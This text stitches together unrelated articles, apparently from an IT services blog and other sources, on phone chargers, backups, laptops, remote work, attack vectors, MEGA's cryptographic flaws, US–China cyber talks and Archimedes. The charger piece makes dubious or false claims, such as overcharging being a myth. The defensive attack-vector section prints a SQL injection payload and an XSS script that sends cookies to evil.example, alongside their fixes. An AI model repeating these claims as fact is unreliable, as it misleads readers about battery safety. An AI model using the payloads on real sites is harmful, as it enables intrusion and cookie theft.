Since neither cable is designed specifically for your Samsung A10, why does any of this matter?
On Google's Pixel, Pixel XL, Nexus 6P and 5X devices, released in 2015/16, the cables were built with a 56k ohm resistor. Without it, unregulated electrical current coming from an uncertified third-party charger, or from the USB ports on a Mac or Windows machine, could spike. This could cause the battery to begin rapidly combusting!
Yes, older devices paired with cheap charging cables could begin smoking and melting. They could even spark a small fire!
Worst of all, because you were using an uncertified charger, you voided your warranty, leaving you on the hook to cover the loss.
With most Android and Apple devices, charging is a little less dangerous.
Apple devices can detect non-certified cables and refuse to charge or sync data.
With Android devices, all cables will accept a charge, and most will allow data to sync. However, Android limits the charge to the lowest possible setting, typically 5W.
This is known as “trickle charging.” It works, but it’s slow.
So what about wireless chargers? Since there's no cable plugging into your phone, it shouldn't make a difference which charger you use, right?
Technically, that’s true, there’s no cable plugging into your phone. But there is a cable connecting the charger to a USB port, or into a wall adapter.
Old wireless chargers topped out at 5W, but today they’re up to as much as 15W. Still, the speed at which your device charges may be limited to the lowest electrical current available.
For example, if you use a 5W adapter with a 15W charging pad, you may only get the 5W charge.
Similarly, if you use a 10W charging pad with a Samsung Galaxy S20, which is capable of charging at up to 15W, your phone may still charge at the 10W electrical current.
How do you know if what you’re buying and using is a high-quality, certified phone charger?
Apple clearly prints “Made For iPhone” or “MFi” on the outside of the cable. All USB-C cables, designed for newer Android devices, read “Compliant C cable – 56k” or something similar.
Micro and Mini USB cables for older Android devices won't have identifiable markings. But they don't require a strong electrical current to charge, so almost any will be fine.
And how much damage does overcharging do to your battery? None. It's a myth. There's no such thing as overcharging a battery. Once it's charged, it's charged.
Damaged chargers and cheap, counterfeit chargers might kill your battery. But generally speaking, mixing and matching cables won’t harm your battery. At least not when it comes to new phones.
You may just be reduced to the trickle charge we mentioned earlier.
Phones from makers like Huawei and OnePlus use proprietary circuitry to deliver a fast charge. That means you have to use the charger that comes with your phone if you want to take full advantage of their quick-charge capabilities.
Note: OnePlus Nord is set to release July 21, 2020, and is available for pre-order.
If you’re not sure which chargers are safe for your device, or if you have any other questions about your mobile device, batteries or chargers, give us a call at 705-739-2281. We can help.
When you don't maintain your network, you set yourself up for critical issues, not the least of which are data loss and downtime.
Here are 3 things you can do right now to protect your network from a catastrophic event.
According to research conducted in March 2020 by HelpNetSecurity.com, 21% of SMBs do not have a data protection plan, leaving them vulnerable to cyber attacks and data loss.
While 57% of the top leaders in accounting, banking and finance said data backup is the key concern in data protection, daily backups are often overlooked. Ontech Systems states, “60% of backups are incomplete and 50% of restores fail.”
Between malware, cyber criminals and natural disasters, it’s not a matter of if SMBs will have a problem, but when.
Data protection is not a set it and forget it task. It requires frequent checks and ongoing maintenance to ensure everything is running as it was set up to run.
For example, you may think your daily backups are working just fine because you see the files every day. But if you’re not checking them, how will you know if those files have become corrupt? How will you know if large chunks of data are being missed?
The only way to be sure your backup procedure is working properly is to check on it frequently.
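One simple way to perform that check is to compare checksums of the source files against the backup copies. A minimal sketch in Python; the source and backup folder paths are hypothetical:

```python
import hashlib
from pathlib import Path

def sha256_of(path: Path) -> str:
    """Hash a file in chunks so large files don't exhaust memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()

def verify_backup(source_dir: str, backup_dir: str) -> list[str]:
    """Report files whose backup copy is missing or doesn't match the source."""
    problems = []
    for src in Path(source_dir).rglob("*"):
        if not src.is_file():
            continue
        dst = Path(backup_dir) / src.relative_to(source_dir)
        if not dst.exists():
            problems.append(f"missing: {dst}")
        elif sha256_of(src) != sha256_of(dst):
            problems.append(f"corrupt or stale: {dst}")
    return problems

# Hypothetical paths -- point these at your own source and backup folders.
for issue in verify_backup("C:/data", "D:/backup/data"):
    print(issue)
```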
It may seem like a hassle to continually update your anti-virus and firewall software but failing to do so can leave you exposed to harmful cyber attacks. According to Ontech, roughly 20% of SMBs will be hacked within 1 year, and more than 50% won’t even know they’ve been attacked.
Protect your data with reputable anti-virus and firewall software. And don’t forget to update security patches! New viruses are being created all the time, which means last month’s anti-virus may be obsolete this month without the new patch.
Of course, there are many more ways to protect important data. When you're ready to explore your data protection options, give us a buzz; our IT experts will help you set up and implement the right data protection plan for your business.
Whether you're replacing a dying old laptop or buying your first one, it's tempting to think that the key thing to look for is the specs, and nothing else. And while specs do translate into longevity, performance and more, if you came across two laptops with the same specs and one was $250 cheaper, you'd obviously buy that one.
Why spend that extra $250? Here’s why:
As with any laptop, specs are king – or at least, that's what the marketing would have you believe. The age-old idiom "you get what you pay for" rules the computer world, whether that be laptops or desktops.
If you spend $3500 on a Mac desktop, you're getting mid- to top-end hardware in a shiny metallic enclosure. You're getting stability and recovery options that Windows-based machines can't come close to, but you're also getting limited and expensive repair options, and technical support that is either hard to come by or expensive as well.
Almost any consumer-grade laptop or desktop is made of plastic. Every time plastic is heated and cooled repeatedly (i.e., when you turn your laptop on and off), its structural integrity weakens. One day you'll go to your laptop, open the lid and *CRACK*, the hinge the lid opens on splits in half, and you can no longer open the screen.
You can either plug the laptop into another monitor, if it supports that, or get the hinge fixed. In our experience, replacing the bottom plastic shell and hinge assemblies on LCDs is so expensive that it's often more economical for you as a consumer to buy another laptop. You'll then have to go through the hassle of transferring your data, re-acquiring your software, disposing of the broken laptop, and more.
Plastic structural integrity can fail in as few as 50 heat/cool cycles, or as many as 1,000. You could get lucky, or you could get a lemon that isn't covered under any warranty. Now you're out $200, and a new headache is forming.
Business grade laptops, available at most high-end computer shops, are usually made of metal, or from a robust polymer that doesn’t weaken when heated and cooled repeatedly.
These laptops, while usually more expensive, come with specs that match or exceed those of a consumer-grade laptop, and are manufactured and engineered to last a company five-plus years.
For a small additional investment, you won't need to replace everything every other year. You'll get the same or a better warranty, and the components inside (what makes up the specs) are usually higher-quality or name-brand parts, not the "as cheap as we can find to drive the price down" consumer-grade parts.
A handy breakdown of what specs you should be asking about, or looking for, will be coming within a few weeks, so stay tuned.
As always, if you have any questions regarding the differences between business and consumer grade computers, please don’t hesitate to contact us!
Ah yes, having the option to work from home. A fantastic perk for the average office employee.
What used to be a one-off just a few months ago is now a government-mandated regulation. At least for the time being. We thought it would be a short-term scenario, but this new way of conducting business may be proving more desirable to many SMBs.
Let’s face it, there’s less overhead, fewer hours spent commuting, and many employees are finding a positive work/life balance. We’re proving that we are truly capable of being productive in our job even though we’re working from home.
For the business owners who decide to give remote working an indefinite kick at the can, transitioning from a traditional work setting will, of course, require some adjustments. Not only by business owners, but by employees as well.
Last year, for example, staff would come together in an office setting, complete with computers, water coolers and a “9 to 5” schedule. The day was quite structured. As an employer, it was easy to keep tabs on everything and everyone. As an employee, it was easy to access information and collaborate with colleagues.
So how do you monitor productivity when you’re nowhere near your employees?
As with any operational changes of this magnitude, there may be pitfalls along the way. We want to help you avoid them. Here are some quick tips:
Now, these are just some of the high-level requirements for a successful work-from-home transition. There are a lot (I mean a LOT) of smaller details that need just as much planning.
Don’t worry, we’re not going to leave you out on the ledge to fend for yourself.
Next week we’ll be talking about all the ins and outs of setting up your team to successfully work from home. We’ll look at:
So, spend this time working through the planning process and getting organized. And we’ll see you back here next week. In the meantime, if you have any questions or need assistance setting things up, give us a call – we’re always happy to help.
Tired of talking about COVID-19 yet? Us, too. Let’s talk about a post-COVID world instead.
The past few months have been … ahem … a whirlwind. Your world has been flipped upside down. You, your staff, and your customers have all been forced to abide by “social distancing” rules, a concept that wasn’t even on your radar earlier this year.
And what happened when we all went home, and stayed home?
We went online, of course! For good, bad or indifferent, we all turned to our trusty interwebs. We logged on for entertainment and socialization, to shop, to do our banking, and even to keep virtual doctor appointments.
No matter what industry you’re in, your customers have been pulled into a digital vortex.
Sure, some may have already been tech savvy, but just as many weren’t ready for the pendulum to swing so far so fast.
What happened next? Your call centre blew up.
Yeah, ours did, too.
Countless businesses just like yours have felt the sudden influx of customer service inquiries since the brick and mortar doors (literally) closed indefinitely.
In all honesty, we’re impressed with how the public is adjusting to being in isolation, forced to fend for themselves online.
… the species that survives is the one that is able to adapt to and to adjust best to the changing environment in which it finds itself. - Darwin
Being in the web and IT space, we’re especially intrigued by how many businesses plan to continue down the digital path to customer self-service even after lockdown restrictions are lifted.
Let's talk about how you can lighten the load on your customer service team by helping customers embrace digital transformation even after your physical doors reopen.
Those are just a few of the many ways to help customers embrace digital transformation. Your call centre team will thank you.
If you're ready to get your ACT together, give us a buzz!
Over the last few years, we have grown accustomed to hearing about cybersecurity incidents affecting companies of all scales and sizes. In 2021, a data breach cost an average of $4.24 million, up 10% from $3.86 million in 2020 — the highest percentage increase year-over-year in the past 17 years. Despite a robust cybersecurity perimeter in response to growing threats, cybercriminals always seem to find a way around it. How do they do it? They use increasingly complex attack vectors.
In this article, we’ll look at how cybercriminals use attack vectors as tools to exploit IT security vulnerabilities and execute their nefarious schemes. We’ll also list some simple security measures your company can put in place to counter threats from these attack vectors.
What Is Meant by Attack Vector?
An attack vector refers to any method or pathway a hacker may use to penetrate, infiltrate or compromise the IT infrastructure of the target entity.
In addition to exploiting vulnerabilities in the system, hackers also use attack vectors to trick humans into compromising security setups. Clue: phishing emails. Phishing ranks as the second most frequently used attack vector in 2021. The top spot goes to compromised credentials while the third goes to cloud misconfiguration.
A cybercriminal can deploy a multitude of attack vectors to deliver malicious payloads, such as viruses, worms and ransomware code, into a victim’s system and sabotage their operations. Compromised credentials, phishing emails and inadequate or missing encryption are some other examples of attack vectors.
Attack Vector vs. Attack Surface
There are times when you will see these two terms used interchangeably, but that isn’t correct.
An attack vector is a tool that cybercriminals use to launch a cyberattack, while an attack surface is the set of all points on a company's network that could be broken through to launch an attack. The surface grows as more endpoints, servers, switches, software applications or other IT assets are configured on a network.
IBM’s Cost of Data Breach report 2021 found that costs of breaches were significantly lower for some companies with a more mature security posture and higher for companies lagging in areas such as security AI and automation, zero-trust and cloud security.
Attack Vector vs. Threat Vector
The terms attack vector and threat vector are interchangeable. As with an attack vector, a threat vector is a way to gain access to an unsecured attack surface such as an open port or an unpatched software vulnerability.
What Are the Different Types of Attack Vectors?
Cybercriminals are quick to invent new attack methods, which easily outsmart old defense mechanisms. In this section, we’ll discuss nine nasty attack vectors that can undermine your business.
1. Compromised Credentials
Compromised credentials are the most used attack vector, responsible for 20% of breaches in 2021. Usernames and passwords stolen from victims are the most common credentials used by threat actors. Cybercriminals can purchase these on the dark web or can trick unsuspecting individuals into giving them up. Hackers may also collect sensitive information from unwitting users by sending a link to a bogus website and requesting their login details.
2. Weak Passwords and Credentials
According to a security consultant, a single compromised password led to the shutdown of Colonial Pipeline, a major U.S. oil pipeline company, causing a fuel shortage across the East Coast of the United States.
The best way to make passwords hard to guess is to change default passwords promptly and to create new passwords with best practices in mind. A strong, complex password mixes uppercase and lowercase letters, numbers, and special characters. According to research conducted by NordPass, some Fortune 500 companies use passwords that can be cracked in less than a second. It's also advisable to change passwords frequently, since hackers can install keylogging software on a user's system to capture personally identifiable information (PII).
Hackers don’t just focus on system credentials used by employees. They also try to intercept passwords used by servers, network devices and security tools, gaining unfettered access to a company’s Active Directory credentials and other valuable databases.
3. Poor and Absent Encryption
Data encryption enables users to transform data into ciphertext before transferring it over a known or unknown network or storing it on a system, enabling only those with the password to decrypt and read it. Weak encryption is easy to break using brute force, whereas in the absence of encryption, data transfer occurs in plaintext, which can be easily intercepted or stolen by threat actors.
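As an illustration of the plaintext-to-ciphertext transformation, here is a short sketch using the Python cryptography library's Fernet recipe (AES with HMAC authentication). It demonstrates symmetric encryption in general, not any particular vendor's product:

```python
from cryptography.fernet import Fernet  # pip install cryptography

key = Fernet.generate_key()   # random key; whoever holds it can decrypt
f = Fernet(key)

token = f.encrypt(b"quarterly payroll report")  # plaintext -> authenticated ciphertext
print(token)             # opaque bytes; useless to an interceptor without the key
print(f.decrypt(token))  # b'quarterly payroll report'
```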
4. Cloud and Device Misconfiguration
According to The State of Cloud Security 2021 report, many data breaches that make headlines are caused by cloud misconfiguration errors. About 36% of cloud professionals surveyed for the report said their organization experienced a serious breach or leak of cloud data in the past year.
Cloud misconfigurations result from user-created settings that do not adequately secure cloud data. They can, for example, disable privileged access settings, giving everyone on the network unfettered access to valuable data.
Device misconfiguration is another trouble spot for companies. As companies rely increasingly on robotics and internet-of-things (IoT) devices to carry out their tasks, a hardware hack can pave the way for cybercriminals.
5. Phishing
About 80% of IT professionals say they are facing a significant increase in phishing attacks in 2021.
Phishing emails continue to be one of the most effective attack vectors. Phishing is a form of social engineering attack that involves using legitimate-looking emails to trick people into giving up their personal information or account credentials. About 90% of incidents resulting in data breaches begin with phishing emails.
While a phishing attack targets employees en masse, a spear-phishing attack targets top-level executives of a company with the aim to steal highly confidential and business-critical information to which only the highest-ranking executives have access.
6. Third-Party Vendors
Suppliers and vendors are also considered attack vectors since hackers can find weaknesses in their software to access the client’s network and launch a supply chain attack. In the event of a cyberattack on a third party that has access to sensitive client data, the consequences are unimaginable.
7. Software Vulnerabilities
There is no such thing as perfect software. Hence, even after a piece of software is released, companies continue to test for bugs and send patches to fix vulnerabilities.
A zero-day vulnerability is a flaw in a network or software that hasn’t been patched or for which a patch isn’t available. Hackers can exploit a zero-day vulnerability to install malicious software, like ransomware, that enables them to manipulate IT infrastructure remotely to spy on an organization’s activities or to disrupt operations.
There were a record-breaking 66 zero-day attacks found to be active in 2021 according to databases like the 0-day tracking project. This is almost double the total reported for 2020, and more than any other year on record.
8. Malicious Insiders
It takes about 231 days for breaches caused by malicious insiders to be identified, behind only compromised credentials at 250 days and business email compromise at 238 days.
As it stands, disgruntled employees already have access to their company’s system details, which they can use to launch cyberattacks or to sell credential information on the dark web. In some cases, insider attacks are not malicious in nature and can be due to a lack of care on the part of employees.
9. Trust Relationships
In order for a communication channel between two or more domains to be secure, there must be an established trust relationship. It allows users to access information from multiple domains with just one login. A trusted domain is one that authenticates the user while the others are called trusting domains. Lax security practices can result in users caching credentials on trusted domains, which can then be stolen and used to launch a cyberattack.
What Are the Different Attacks Launched With Attack Vectors?
Cybercriminals have access to a wide range of attack vectors for conducting business-breaking cyberattacks. Here are some of the most common and debilitating attacks launched using attack vectors.
1. Malware and Ransomware
Malware is an intrusive piece of software that enables cybercriminals to access and damage computing systems and networks severely. The infection can take the form of a virus, trojan horse, worm, spyware, adware, rootkit or the infamous ransomware.
The number of ransomware cases has been steadily increasing since 2016 and now accounts for 10% of all breaches. Ransomware is a type of malware that can be installed covertly on a computer system, preventing the victim from accessing it. As soon as authorized users lose access, cybercriminals either threaten to release data publicly or block usage unless a ransom is paid. Colonial Pipeline suffered a ransomware cyberattack earlier this year and had to pay a whopping $4.4 million to regain access to their network.
2. Distributed Denial-of-Service (DDoS) Attack
The purpose of a DDoS attack is to overload a victim's system or network by flooding it with bogus traffic. As a result of the unusually high data volumes, the network becomes paralyzed and unable to cope with new requests. DDoS attacks typically begin by exploiting a vulnerability in one computer system, making it the DDoS master. The master system then infects other vulnerable systems with malware.
In critical industries, a server overload can result in the business going offline for hours, which can cause a dip in revenue and customer departure. Yandex, a Russian tech giant, recently said that its servers were the victims of the biggest DDoS attack ever recorded.
3. Brute Force
A brute force attack is a cryptographic hack in which cybercriminals use the computing power of their systems to crack usernames, passwords, encryption keys or any other authentication credentials for unauthorized use. Generally, the longer the password, the more combinations that will need to be tested.
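The arithmetic behind that claim is easy to see. A sketch, assuming a hypothetical attacker testing ten billion guesses per second against the 94 printable ASCII characters:

```python
import string

# 52 letters + 10 digits + 32 punctuation symbols = 94 printable characters
charset = len(string.ascii_letters + string.digits + string.punctuation)
guesses_per_second = 1e10  # hypothetical attacker throughput

for length in (6, 8, 10, 12):
    combos = charset ** length
    years = combos / guesses_per_second / (60 * 60 * 24 * 365)
    print(f"length {length}: {combos:.2e} combinations, ~{years:.2e} years to exhaust")
```

Each extra character multiplies the keyspace by 94, which is why length matters far more than any single clever substitution.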
4. Man-in-the-Middle Attacks
A man-in-the-middle attack occurs when an attacker inserts themselves into the "middle" of an ongoing conversation or data transfer and pretends to be a legitimate participant. By eavesdropping on the communication, hackers can access crucial data, like login information, which they can modify for personal benefit.
Hackers can even use their position to send malicious links to legitimate parties to damage their systems and databases and to launch advanced persistent threats (APTs).
5. SQL Injections (SQLi)
SQL injection is an attack vector that exploits a security vulnerability in a program's code. It allows hackers to inject malicious code into web queries, data-driven applications and, in some cases, servers and other backend infrastructure. Once the attacker has administrative rights over the database, they can spoof identities, reveal or destroy data, remove access to it or cause repudiation issues.
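A minimal sketch of the vulnerability and its standard fix, using Python's built-in sqlite3 module; the table and the attacker input are illustrative:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, is_admin INTEGER)")
conn.execute("INSERT INTO users VALUES ('alice', 1)")

user_input = "' OR '1'='1"   # attacker-controlled value

# VULNERABLE: string concatenation lets the input rewrite the query.
query = "SELECT * FROM users WHERE name = '" + user_input + "'"
print(conn.execute(query).fetchall())   # returns every row in the table

# SAFE: a parameterized query treats the input as data, never as SQL.
print(conn.execute("SELECT * FROM users WHERE name = ?", (user_input,)).fetchall())  # []
```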
6. Cross-Site Scripting (XSS)
Cross-site scripting attacks, or XSS, exploit web security flaws by injecting malicious scripts into otherwise trustworthy websites. An XSS attack occurs when malicious code is sent from a web application to an unsuspecting user's browser as a script. Not realizing that the script shouldn't be trusted, the browser executes it, allowing hackers to access cookies and other sensitive information stored in the browser.
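The standard defense is to escape untrusted input before it reaches the page. A small sketch using Python's standard library; the injected script and URL are invented for illustration:

```python
import html

# Attacker-supplied "comment" that tries to exfiltrate the session cookie.
comment = '<script>document.location="https://evil.example/?c="+document.cookie</script>'

# Rendered as-is, the browser would execute the script.
unsafe_fragment = f"<p>{comment}</p>"

# Escaped, the same input is displayed as inert text.
safe_fragment = f"<p>{html.escape(comment)}</p>"
print(safe_fragment)
```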
How to Reduce Risk From Attack Vectors?
Cyberattacks can be stopped in their tracks if companies follow strict security protocols. This is especially important given the remote and hybrid work environments we are working in today. Here are some core security practices that will help you stay one step ahead of cybercriminals while making your IT technicians’ jobs easier.
1. Utilize Strong Password and Credential Security
It’s tedious to remember multiple passwords. A simple combination of your name and date of birth may seem convenient but it certainly isn’t best practice. Creating a difficult password is a lot easier than figuring out how to recover from a cyberattack.
Here are some tips on how to create strong passwords (a short generation example follows the list):
• Usernames and passwords should be complex and should be reset frequently
• Do not use the same credentials across multiple applications and systems
• Two-factor authentication (2FA) is a must
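Putting the first tip into practice, a strong random password can be generated with Python's secrets module, which is designed for cryptographic use:

```python
import secrets
import string

def make_password(length: int = 16) -> str:
    """Generate a random password drawn from letters, digits, and symbols."""
    alphabet = string.ascii_letters + string.digits + string.punctuation
    return "".join(secrets.choice(alphabet) for _ in range(length))

print(make_password())  # different on every run
```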
2. Maintain Strong Data Encryption
Employees use multiple mobile devices and networks to exchange business information. This is inevitable. A strong encryption tool that uses 192- and 256-bit keys for data encryption is a great way to combat threats from cybercriminals.
3. Update Systems and Install Patches Regularly
Cybercriminals love exploiting unpatched software vulnerabilities for zero-day attacks. Moreover, they continue exploiting the vulnerability for months, resulting in irreversible damage. When you use Kaseya VSA, you can automate patch management and provide your business with an extra layer of security. Organizations can reduce the likelihood of breaches by 41% if they deploy patches promptly.
Did you know that coordination problems between teams cause many organizations to lose about 12 days when implementing a patch? VSA enables the creation of policy profiles for the approval, review or rejection of patch updates.
4. Phishing and Cyber Awareness Training
Cybercriminals can take advantage of human vulnerabilities to launch large-scale cyberattacks and cripple business operations. Train your employees regularly to look out for attack vectors like phishing emails or fake websites so that they’ll be sharper when it comes to spotting them.
5. Audit Security Configurations
Creating a robust cybersecurity infrastructure is the first step in the fight against rampant cybercrime. Nevertheless, maintaining the availability of the infrastructure and regularly fixing all vulnerabilities is a never-ending undertaking. Security audits should be performed at least quarterly and having an external auditor to conduct the audit will ensure nothing slips through the cracks.
6. Watertight BYOD Policies
We are entering an era of remote and hybrid work. As a result, companies are embracing the bring your own device (BYOD) culture because it has been shown to boost productivity and employee happiness. However, if BYOD policies are not secure, it could open the doors for cybercriminals to penetrate a company’s infrastructure. It is possible to protect your information from cybercriminals by storing it in a secure cloud environment or on a server and allowing only VPN-connected devices to access it.
Minimize Danger From Attack Vectors With Kaseya
To protect your employees and business from complex cyberattacks, you need the latest security tools in your arsenal.
Even though antivirus (AV), antimalware (AM) and firewall solutions are essential, they are only your first line of defense against cybercrime. This is where Kaseya VSA comes in — a top-of-the-line unified remote monitoring and management solution (uRMM) that lets you manage core IT security functions from a single pane of glass.
VSA helps you ensure security patches are deployed on time, reducing the attack surface. In addition, it provides complete insight into IT assets, enables backup management, and keeps endpoints secure through the use of the most current AV/AM solutions. You also benefit from Kaseya VSA's built-in security features, such as two-factor authentication, which also help improve IT efficiency.
Having the right tool by your side allows you to monitor IT assets 24/7 as well as identify and address any suspicious activity in real time. To learn more, request a free demo today.
“All your data on MEGA is encrypted with a key derived from your password; in other words, your password is your main encryption key. MEGA does not have access to your password or your data. Using a strong and unique password will ensure that your data is protected from being hacked and gives you total confidence that your information will remain just that – yours.”
But there's a problem. A Swiss team of researchers has just proved those claims wrong.
And that's not all. The research went one step further, finding that an attacker could insert malicious files into the storage, passing all authenticity checks of the client.
Researchers at the Department of Computer Science at ETH Zurich in Switzerland reviewed the security of MEGA and found significant issues in how it uses cryptography.
These findings could lead to devastating attacks on the confidentiality and integrity of user data in the MEGA cloud.
The MEGA client derives an authentication key and an encryption key from the password. The authentication key identifies users to MEGA. The encryption key encrypts a randomly generated master key, which in turn encrypts other key material of the user. Every account has a set of asymmetric keys: An RSA key pair for sharing data, a Curve25519 key pair for exchanging chat keys for MEGA’s chat functionality, and an Ed25519 key pair for signing the other keys. Furthermore, the client generates a new key for every file or folder (collectively referred to as nodes) uploaded by the user.
Long story short, all the keys are derived in one way or another from the password, and all the keys are stored (in encrypted form) on MEGA's servers to support access from multiple devices.
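MEGA's actual derivation scheme has its own details, but the general pattern of stretching one password into several independent keys can be sketched with a standard KDF such as PBKDF2; the password, salt handling and key split below are purely illustrative:

```python
import hashlib
import os

password = b"correct horse battery staple"  # example passphrase
salt = os.urandom(16)                       # stored alongside the account, not secret

# One slow KDF pass, then split the output into two independent keys.
material = hashlib.pbkdf2_hmac("sha512", password, salt, iterations=600_000, dklen=64)
auth_key, encryption_key = material[:32], material[32:]
# auth_key identifies the user to the server; encryption_key protects the master key.
```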
Ciphertext is encrypted text transformed from plaintext using an encryption algorithm. The researchers built two attacks based on the lack of integrity protection of ciphertexts containing keys, and two further attacks to breach the integrity of file ciphertexts and allow a malicious service provider to insert chosen files into a user's cloud storage.
Due to the flawed integrity protection, a malicious service provider can recover a user's private RSA share key (used to share file and folder keys) over 512 login attempts. The number is 512 because the attack abuses the RSA-CRT implementation in MEGA clients to build an oracle that leaks one bit of information about a factor of the RSA modulus per login attempt.
As a result the malicious service provider can recover any plaintext encrypted with AES-ECB under a user’s master key. This includes all node keys used for encrypting files and folders. As a consequence, the confidentiality of all user data protected by these keys, such as files and chat messages, is lost.
Based on the first two attacks, a malicious service provider can construct an encrypted file. The user cannot demonstrate that they didn't upload the forged data because the files and keys are indistinguishable from genuinely uploaded ones. It needs no further explanation that introducing a malicious file in such an attack could further compromise not only the user’s system, but also for those the user has shared their files or folders with.
MEGA acknowledged the issue on March 24, 2022, released patches on June 21, 2022, and awarded the researchers a bug bounty. But MEGA's fix differs greatly from what the researchers proposed, patching only the first attack, since the other attacks rely on it.
Since that does not fix the key reuse issue, lack of integrity checks, and other systemic problems the researchers identified, this remains a source of concern for them.
As a regular MEGA user there is no reason to worry about these flaws, especially if you haven’t logged in more than 512 times. An attacker would need to have control over MEGA’s API servers or TLS connections without being noticed to perform any of these attacks.
Anyone interested in more technical details can read the researchers' paper.
The U.S. and China have agreed to begin cooperating on cybersecurity. The two countries have agreed that something must be done to mitigate an issue that has become more and more troublesome over the past several years.
A great deal of progress regarding the issue of cybersecurity was made during the first high-level meeting between the U.S. and China on the subject. Both countries have agreed to guidelines on sharing computer security information, a hotline open to discuss issues that may arise, a joint cybersecurity exercise and a promise to continue their dialog on concerns they both share such as the theft of proprietary information and trade secrets.
In the past, the U.S. and China have had a very trying relationship in regard to cybersecurity. Tensions began to rise in 2010, when Google accused China-based hackers of stealing its intellectual property. Then, in 2014, the U.S. Justice Department charged five members of the People's Liberation Army with stealing trade secrets from companies based in the U.S. Many security experts and tech companies believe the Chinese government has sanctioned and even authorized the hacking of both Western companies and governments, although the Chinese government has consistently denied these allegations.
Top-level U.S. and Chinese officials were present for the signing of the agreement in Washington, D.C., and both countries plan to meet again in Beijing in May 2016.
Mad Dog 21/21: Torque Is Cheap
October 26, 2015 Hesh Wiener
“Screw it,” said Archimedes of Syracuse, refusing to surrender to the gravity of the situation. Around 250 B.C., he developed a water pump that converted torque to lift. It was a helix inside a cylinder, a progenitor of propellers and augers. Archimedes also devised ingenious ways to calculate volume and mass. Archimedes’ two principal pursuits, applied physics and applied math, are as important today as ever, particularly for IBM’s current passion, the Internet of Things.
The “eureka” story has been around a long time. Notably, an essay on floating bodies that very likely originated with Archimedes appears in a palimpsest, a manuscript on parchment that recycled an older text on the costly medium. In this case, the more recent text was a 13th century prayer book. The older, original text of what has come to be called the Archimedes Palimpsest is a 10th century compendium of various works by the great Greek mathematician passed down through the generations. Although the palimpsest was created 1,200 years after Archimedes died and overwritten 300 years later, it is believed by scholars to be an authentic rendition. It is written in Byzantine Greek, a linguistic descendant of the Doric Greek of the Greeks living in Sicily during Archimedes’ lifetime.
The palimpsest, which includes seven treatises, the most relevant called On Floating Bodies, provides an academic foundation for the colorful tale of Archimedes and the crown. Basically, Hiero, the ruler of Sicily, worried that a crown made for him was a fake, made partially of silver rather than the pure gold the king had given his goldsmith. Hiero asked Archimedes to figure out a way to test the purity of the gold in the crown without destroying it. Archimedes had the problem on his mind when he took a bath and as he noticed the way the water level rose as he got into the tub, he had an insight. He figured out that the crown would displace the same amount of water as a bar or lump of pure gold with the same volume . . . if the crown was pure gold. If, however, the crown was part silver, which is less dense than gold, it would have to have a larger volume to reach the correct weight and thus, if immersed, would displace more water than a pure gold crown of the same weight.
So, the testing process came to this: Archimedes would get pure gold of the exact weight given by the king to the goldsmith. He would then put the gold in a vessel and fill the vessel to its brim with water. Next, he would remove the gold leaving the water in place. Finally he would put the crown in the water. If the water rose to the same level the crown had the correct volume and it was therefore pure gold. If, on the other hand, the vessel overflowed, the overflow would have the same volume as the excess volume occupied by the impure crown. This would be the case no matter how ornate the crown might be, whatever its shape.
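The numbers make the method vivid. Using modern density values (about 19.3 g/cm³ for gold and 10.5 g/cm³ for silver, figures Archimedes did not have in these units), a hypothetical 1,000-gram crown works out as follows:

```latex
V = \frac{m}{\rho}
\qquad
V_{\text{pure gold}} = \frac{1000}{19.3} \approx 51.8\ \text{cm}^3
\qquad
V_{\text{70/30 gold/silver}} = \frac{700}{19.3} + \frac{300}{10.5} \approx 64.8\ \text{cm}^3
```

The adulterated crown displaces roughly 13 cm³ more water, an overflow easily caught and measured.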
When Archimedes, sitting in a tub, came up with the scheme he is said to have jumped out of the bath and run naked through the streets of Syracuse shouting, “eureka,” which means “I found it.” He seems to have found more than a method of assay. As the story goes, the crown was in fact a fake. The goldsmith had to answer to the king. Clever Archimedes was the hero of the day.
Many matters involving the determination of volume were of paramount importance to Archimedes, and a sculpture referring to his famous proof that a sphere enclosed in a cylinder of the same height has 2/3 the cylinder’s volume–and 2/3 of its surface area, too–was put on his tomb. But then the tomb’s location was apparently lost. It was rediscovered a century or so after Archimedes’ death by the Roman orator Marcus Tullius Cicero. A connection of Cicero to Sicily is preserved in, of all places, the Finger Lakes district of central New York state, where the town of Tully, named for Cicero, with its intellectual resources, is situated a half hour’s drive from the city of Syracuse.
Archimedes is also famous in myth and fact for the development of war machines to defend the port of Syracuse. He is credited with the creation of catapults and of cranes that could capsize or sink ships nearing the walls of the port. These machines were based on Archimedes’ understanding of levers and pulleys, on his mastery of torque.
For quite a long time there were few improvements made to the devices invented, improved, or perfected by Archimedes, who was far ahead of his times. Of all the technologies advanced by Archimedes, the screw has arguably been the slowest to mature. Screw pumps made today, used for irrigation, are pretty much the same as the ones devised by Archimedes. But the technology of screw fasteners continues to evolve to this very day, and with it the machines used to drive screws.
In Archimedes’ time and for centuries thereafter, the most widespread practical application of the screw was to turn torque into pressure, powering presses used to make olive oil and to extract juice from fruit. The screws in these presses were wooden and quite large, and this was the state of the art more than 1600 years later when screw mechanisms were used to actuate Gutenberg’s printing press. Small metal screws, so widely used today, simply didn’t exist until the Renaissance. The metalworking technologies and skills involved in the manufacture of screws arose in Europe during the 14th and 15th centuries. One well-known application, even several hundred years ago when screws were painstakingly made by hand, was in the assembly of guns.
At the time, the fasteners used in most other applications, from carpentry to construction to shipbuilding, were nails or pegs, items that are a lot simpler to manufacture. While large wood lathes predate Archimedes, smaller lathes suitable for metalworking were developed much later. Cannon whose barrels were cut with a boring machine, a cousin of the lathe, didn't appear until the 18th century.
Even when lathes and thread-cutting machines became widely available during the Industrial Revolution, for quite some time the only screws that could be mass-produced had cylindrical rather than tapered shafts, the kind commonly called machine screws. Finally, in the mid-19th century, inventors perfected machines to economically cut tapered screws that could be used in wood or metal that wasn't threaded before fastening. Even then, most screws were of poor and inconsistent quality, which held back the advancement of manufacturing. Eventually, developments such as the Robertson square-drive screw, adopted by, among others, Ford for use in its Model T cars, brought about permanent advancements in the mass production of complex machines.
Today, a hundred years after Robertson permanently elevated fastener technology to a higher level, the tools used to build (and repair) most everything are finally gaining the sophistication to take advantage of leading edge fasteners. A key element in this process has been the adoption of electronic technologies widely used elsewhere, such as in smartphones, to improve the versatility of hand tools.
Currently, everyone from professional tradesmen to home do-it-yourselfers seems to be migrating from the use of nails driven by hammers (and nail guns) to high-technology screws and tools to insert them.
